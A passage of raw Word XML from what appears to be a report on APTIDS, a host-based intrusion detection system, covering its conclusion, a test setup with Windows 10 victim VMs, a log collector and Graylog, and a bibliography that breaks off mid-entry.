      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">APTIDS has abilities to capture and display the data about malicious activities as soon as possible. Furthermore, it is very adaptable which only require an agent to be install on a system and point to the address of the current running DLCH in network. As default, DLCH points to a CLSS which helps administrators decrease the time used to configure and adding host to the monitor process. </w:t>
      </w:r>
      <w:r w:rsidR="0030797D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">However, the rate of false-positive is high, and the completeness </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> be improved much, those make APTIDS be more suitable for using in small network or not much valuable network such as small companies, developing environments and experimental environments or honeynets. Our further work to improve APTIDS is to reduce the false-positive rate, increase is completeness by adding more modules those can help in monitor as more as possible the incoming intrusions and malicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRPr="0030797D" w:rsidRDefault="004D7C5A" w:rsidP="0030797D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc485303757"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDIX</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc485303758"/>
      <w:r>
        <w:t>Setting up testing environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00BA52F8">
        <w:t>running those</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> experiment</w:t>
      </w:r>
      <w:r w:rsidR="00BA52F8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000F3FD1">
        <w:t>, we set up an environment using</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="00E51210" w:rsidP="004D7C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D7C5A">
        <w:t xml:space="preserve"> Windows 10 machine</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004D7C5A">
        <w:t xml:space="preserve"> as victim host for running malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>An Ubuntu as DLCH which run the log collector server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="004D7C5A" w:rsidP="004D7C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A Graylog server</w:t>
      </w:r>
      <w:r w:rsidR="00E51210">
        <w:t xml:space="preserve"> version 2.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which receive log information from DLCH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E51210" w:rsidRDefault="00E51210" w:rsidP="00E51210">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E51210" w:rsidRDefault="00E51210" w:rsidP="00E51210">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the Windows 10 hosts, we run the experiments by manually modify Registry database and Windows Service. We also download some sample of malware in the site: </w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:history="1">
        <w:r w:rsidRPr="00AB0568">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ytisf/theZoo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> . Some samples do not run on virtual machine, some run but APTIDS cannot capture since they either do not create any persistent entry for boot up or create entries in a place that APTIDS currently does not monitor. The samples captured is listed in the test above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F3FD1" w:rsidRDefault="00E51210" w:rsidP="00E51210">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>When captures a malicious event, APTIDS agents those run on these windows 10 hosts then transfer data to the DLCH which is implemented in the Ubuntu machine. The DLCH store log and the log files is collected by Graylog Collector Sidecar to send to Graylog server. Graylog server then shows the log information on its display windows.</w:t>
      </w:r>
      <w:r w:rsidR="000F3FD1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D7C5A" w:rsidRDefault="000F3FD1" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc485303759"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bibliography</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1378822044"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="00A42FD3">
              <w:pPr>
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r>
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">1. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Grimes, Roger A.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Infected with malware? Check your Windows registry. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">InfoWorld. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>March 10, 2015.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">2. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Developers, Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Introduction to Windows Service Applications. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Developter Network. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] https://msdn.microsoft.com/en-us/library/d56de412(v=vs.110).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">3. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Freemon, Mike.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">OSSEC Open Source Security. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>s.l. : CSC570G Linux Implementation/Administration Practicum, Fall 2008.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">4. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Nel, Martinus and Khiabani, Hamed.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">SAMHAIN: Host Based Intrusion Detection via File Integrity Monitoring. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>s.l. : SANS Institute, 2014.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">5. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Developer, Linux.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> INOTIFY. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Linux Programmer's Manual. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] http://man7.org/linux/man-pages/man7/inotify.7.html.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">6. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Structure of the Registry. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Windows Dev Center. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms724946(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">7. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Russinovich, Mark.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Inside the Registry. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Technet. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft, April 1997. https://technet.microsoft.com/en-us/library/cc750583.aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">8. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Windows Kernel-Mode Configuration Manager. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Hardware Dev Center. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/hardware/ff565712(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">9. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Ligh, Michael Hale, et al.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>United States of America : John Wiley &amp; Sons, Inc., 2014.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">10. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> The System Registry. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Developer Network . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft Coporation . https://msdn.microsoft.com/en-us/library/ms970651.aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">11. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>MSDN.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> About Services. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Developer Network . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms681921(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">12. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> How RPC Works. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Windows Dev Center . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/aa373935(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">13. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>MSDN.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Remote Procedure Call. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Windows Dev Center . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/aa378651(v=vs.85).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t xml:space="preserve">14. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>TechNet.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Understanding Windows Services Architecture. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Technet . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft, May 23, 2005. https://technet.microsoft.com/en-us/library/881d8b23-d274-4313-a666-88f80c2cfd92.aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">15. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Microsoft.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> How Access Tokens Work. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Technet . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] March 28, 2003. https://technet.microsoft.com/en-us/library/cc783557(v=ws.10).aspx.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">16. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Team, Graylog Developer.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Processing Pipelines. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Graylog Document. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Graylog, Inc. http://docs.graylog.org/en/2.2/pages/pipelines/pipelines.html.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">17. —. Graylog Collector Sidecar. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Graylog Document. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Graylog, Inc. http://docs.graylog.org/en/2.2/pages/collector_sidecar.html.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">18. —. Streams. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Graylog Document . </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Graylog, Inc. http://docs.graylog.org/en/2.2/pages/streams.html.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">19. —. Alerts. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Graylog Document. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Graylog, Inc. http://docs.graylog.org/en/2.2/pages/streams/alerts.html.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">20. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Sikorski, Michael and Honig, Andrew.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>San Francisco : William Pollock, 2012. ISBN-10: 1-59327-290-1 / ISBN-13: 978-1-59327-290-6.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">21. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Russinovich, Mark.</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve"> Pushing the Limits of Windows: Handles. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft Technet. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t>[Online] Microsoft , September 29, 2009. https://blogs.technet.microsoft.com/markrussinovich/2009/09/29/pushing-the-limits-of-windows-handles/.</w:t>
              </w:r>
            </w:p>
            <w:p w:rsidR="000F3FD1" w:rsidRDefault="000F3FD1" w:rsidP="000F3FD1">
              <w:pPr>
                <w:pStyle w:val="Bibliography"/>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
                <w:t xml:space="preserve">22. </w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:t>Developer, Microsoft.</w:t>
